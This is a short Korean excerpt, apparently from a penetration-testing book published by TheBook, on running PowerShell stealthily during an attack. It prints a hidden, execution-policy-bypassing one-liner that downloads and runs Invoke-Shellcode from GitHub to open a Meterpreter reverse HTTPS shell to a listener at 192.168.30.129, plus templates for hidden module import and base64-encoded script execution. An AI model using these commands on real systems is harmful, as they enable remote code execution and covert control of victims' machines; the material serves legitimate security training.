더북(TheBook)

다음은 이 모든 내용을 적용한 파워셸 명령이다.

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.30.129 -Lport 80

이 옵션으로 실행하면 파워셸을 쉽게 사용할 수 있다. 또 다른 예를 살펴보자.

공격 대상에 이미 동일한 파일을 다운로드했다고 하자. 웹 페이지를 방문해 자동으로 다운로드해서 실행하기를 원치 않는다면, 다음과 같이 실행한다.

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "& {Import-Module [파워셸 스크립트 파일 이름과 경로]; [파라미터]}"

책에서는 base64로 인코딩된 파워셸 스크립트를 사용한다. 파워셸 스크립트를 인코딩하려면 다음과 같이 실행한다. 이렇게 실행하면 침투할 때 꽤 직관적으로 파워셸을 사용할 수 있을 것이다.

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc [Base64 코드]

신간 소식 구독하기
뉴스레터에 가입하시고 이메일로 신간 소식을 받아 보세요.